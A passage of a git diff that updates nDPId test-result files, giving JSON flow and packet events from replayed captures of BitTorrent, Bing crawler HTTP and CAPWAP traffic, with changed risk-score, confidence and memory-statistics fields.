RuEeo19Qvx\/8="}
-00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":80,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492508991649,"flow_last_seen":1492508991681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31856,"flow_avg_l4_payload_len":995,"midstream":1,"ts_msec":1492508991681,"l3_proto":"ip4","src_ip":"77.222.174.20","dst_ip":"10.0.0.14","src_port":2866,"dst_port":46610,"l4_proto":"tcp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
-00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492508991649,"flow_last_seen":1492508991681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":31856,"flow_avg_l4_payload_len":995,"midstream":1,"ts_msec":1492508991681,"l3_proto":"ip4","src_ip":"77.222.174.20","dst_ip":"10.0.0.14","src_port":2866,"dst_port":46610,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1492508985380,"flow_last_seen":1492508985594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34752,"flow_avg_l4_payload_len":724,"midstream":1,"ts_msec":1492508994096,"l3_proto":"ip4","src_ip":"185.56.20.36","dst_ip":"10.0.0.14","src_port":53646,"dst_port":35030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":479,"source":"bittorrent_ip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":431,"flow_first_seen":1492508991649,"flow_last_seen":1492508994096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":441640,"flow_avg_l4_payload_len":1024,"midstream":1,"ts_msec":1492508994096,"l3_proto":"ip4","src_ip":"77.222.174.20","dst_ip":"10.0.0.14","src_port":2866,"dst_port":46610,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
-00163{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":479,"source":"bittorrent_ip.pcap","alias":"nDPId-test","total-events-serialized":16}
-~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
-~~ packets captured/processed: 479/479
-~~ skipped flows.............: 0
-~~ total layer4 data length..: 476392 bytes
-~~ total detected protocols..: 2
-~~ total active/idle flows...: 2/2
-~~ total timeout flows.......: 0
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4873400 bytes
-~~ total memory freed........: 4873400 bytes
-~~ total allocations/frees...: 100061/100061
-~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ json string min len.......: 168 chars
-~~ json string max len.......: 2443 chars
-~~ json string avg len.......: 1375 chars
diff --git a/test/results/bittorrent_utp.pcap.out b/test/results/bittorrent_utp.pcap.out
index 6ed591f26..bbe33d382 100644
--- a/test/results/bittorrent_utp.pcap.out
+++ b/test/results/bittorrent_utp.pcap.out
@@ -1,11 +1,11 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent_utp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1456385034843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1456385034843,"pkt":"xCwDBkn+LFbcjDU0CABFCACEN6IAAHARjPNS83ErwKgBBf3Jn\/8AcJbNZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AdimJ292LCw98nSvKCf40fHeZTE6cTk6Z2V0X3BlZXJzMTp0MjoOYTE6djQ6TFQBATE6eTE6cWU="}
-00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
+00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1456385034843,"flow_last_seen":1456385034843,"flow_idle_time":180000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"ts_msec":1456385034843,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1456385039236,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"ts_msec":1456385039236,"pkt":"xCwDBkn+LFbcjDU0CABFCACEPR1AAHARR3hS83ErwKgBBf3Jn\/8AcOi+ZDE6YWQyOmlkMjA69\/YAfOoTUG5RTefsvJTyrlFxFfg5OmluZm9faGFzaDIwOvf2AbAuK1Rd0f1URppB\/xHRD5bKZTE6cTk6Z2V0X3BlZXJzMTp0MjoZ4TE6djQ6TFQBATE6eTE6cWU="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1456385040274,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1456385040274,"pkt":"xCwDBkn+LFbcjDU0CABFCAAwPfxAAHARRu1S83ErwKgBBf3Jn\/8AHJxJQQBTAhDusvAAAAAAAAAAAOf1AAA="}
-00718{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1456385034843,"flow_last_seen":1456385041276,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":15014,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1456385041276,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
+00835{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1456385034843,"flow_last_seen":1456385041276,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":15014,"flow_avg_l4_payload_len":469,"midstream":0,"ts_msec":1456385041276,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1456385034843,"flow_last_seen":1456385054059,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":37877,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":1456385054059,"l3_proto":"ip4","src_ip":"82.243.113.43","dst_ip":"192.168.1.5","src_port":64969,"dst_port":40959,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":86,"source":"bittorrent_utp.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 86/86
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4859483 bytes
-~~ total memory freed........: 4859483 bytes
-~~ total allocations/frees...: 99641/99641
+~~ total memory allocated....: 4944436 bytes
+~~ total memory freed........: 4944436 bytes
+~~ total allocations/frees...: 101231/101231
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
-~~ json string max len.......: 728 chars
-~~ json string avg len.......: 514 chars
+~~ json string max len.......: 845 chars
+~~ json string avg len.......: 572 chars
diff --git a/test/results/bot.pcap.out b/test/results/bot.pcap.out
new file mode 100644
index 000000000..8029846c5
--- /dev/null
+++ b/test/results/bot.pcap.out
@@ -0,0 +1,23 @@
+00435{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bot.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645108240233,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1645108240233,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1645108240233,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQIAMBFSQABuBooHKE2nJFkfSNz9AABQtwbJ7AAAAABwwvrwl9EAAAIEBaABAQQC"}
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1645108240233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":66,"pkt_l4_len":28,"ts_msec":1645108240233,"pkt":"AAAMB6wytJaRl+L8gQAATQgARQAAMAAAQAA\/BspbWR9I3ChNpyQAUP0AWPWTl7cGye1wEnIQNMAAAAIEBbQBAQQC"}
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":64,"pkt_l4_len":20,"ts_msec":1645108240339,"pkt":"AFBWtlQQQFU5D63CgQAATQgARQAAKBFTQABuBooQKE2nJFkfSNz9AABQtwbJ7Vj1k5hQEPrw2KMAAKqq+vDYow=="}
+00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1645108240233,"flow_last_seen":1645108240339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1645108240339,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"atlanteditorino.it","url":"atlanteditorino.it\/quartieri\/img\/S.Donato_M.Vittoria1930_B.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; bingbot\/2.0; +http:\/\/www.bing.com\/bingbot.htm)"}}
+00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":402,"flow_first_seen":1645108240233,"flow_last_seen":1645108245896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":407096,"flow_avg_l4_payload_len":1012,"midstream":0,"ts_msec":1645108245896,"l3_proto":"ip4","src_ip":"40.77.167.36","dst_ip":"89.31.72.220","src_port":64768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"}}
+00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":402,"source":"bot.pcap","alias":"nDPId-test","total-events-serialized":8}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 402/402
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 407096 bytes
+~~ total detected protocols..: 1
+~~ total active/idle flows...: 1/1
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4691598 bytes
+~~ total memory freed........: 4691598 bytes
+~~ total allocations/frees...: 101549/101549
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 157 chars
+~~ json string max len.......: 870 chars
+~~ json string avg len.......: 562 chars
diff --git a/test/results/bt_search.pcap.out b/test/results/bt_search.pcap.out
index 6d91b3933..abc795044 100644
--- a/test/results/bt_search.pcap.out
+++ b/test/results/bt_search.pcap.out
@@ -1,11 +1,11 @@
 00441{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bt_search.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430752225251,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"ts_msec":1430752225251,"pkt":"AQBeQJiPABZEH1lmCABFAACTaOEAAP8RCRrAqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
+00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752225251,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752225251,"flow_last_seen":1430752225251,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752525284,"flow_last_seen":1430752525284,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430752525284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":161,"pkt_l4_len":127,"ts_msec":1430752525284,"pkt":"AQBeQJiPABZEH1lmCABFAACTCiwAAP8RZ8\/AqABm78CYjxpzGnMAf8gHQlQtU0VBUkNIICogSFRUUC8xLjENCkhvc3Q6IDIzOS4xOTIuMTUyLjE0Mzo2NzcxDQpQb3J0OiA2MTE5Nw0KSW5mb2hhc2g6IEVENEYxMDg1RTg4NUY5OEY5QTY5QjcwRUU4OUVCOTg4QjhGRDkxMTUNCg0KDQo="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752525284,"flow_last_seen":1430752525284,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
+00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752525284,"flow_last_seen":1430752525284,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":""}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430752525284,"flow_last_seen":1430752525284,"flow_idle_time":180000,"flow_min_l4_payload_len":119,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1430752525284,"l3_proto":"ip4","src_ip":"192.168.0.102","dst_ip":"239.192.152.143","src_port":6771,"dst_port":6771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00157{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"bt_search.pcap","alias":"nDPId-test","total-events-serialized":10}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -16,10 +16,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4858247 bytes
-~~ total memory freed........: 4858247 bytes
-~~ total allocations/frees...: 99560/99560
+~~ total memory allocated....: 4942872 bytes
+~~ total memory freed........: 4942872 bytes
+~~ total allocations/frees...: 101150/101150
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 162 chars
-~~ json string max len.......: 651 chars
-~~ json string avg len.......: 476 chars
+~~ json string max len.......: 685 chars
+~~ json string avg len.......: 493 chars
diff --git a/test/results/capwap.pcap.out b/test/results/capwap.pcap.out
index d01bda419..5a865db6f 100644
--- a/test/results/capwap.pcap.out
+++ b/test/results/capwap.pcap.out
@@ -1,10 +1,10 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"capwap.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1422328949167,"flow_last_seen":1422328949167,"flow_idle_time":180000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1422328949167,"l3_proto":"ip4","src_ip":"192.168.10.9","dst_ip":"192.168.10.10","src_port":5246,"dst_port":12379,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"capwap.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1422328949167,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"ts_msec":1422328949167,"pkt":"uDhh8wWsJOmzR64gCABFwABdANlAAH8RZJPAqAoJwKgKChR+MFsASQAAAQAAABX+\/wABAAAAAAABADCRUl3gOBqBz\/u8XElQaHVuhYA4Oyehwv8gEXQ+BVAOU1L6bxnlZCgpb3mFtLC\/ZhI="}
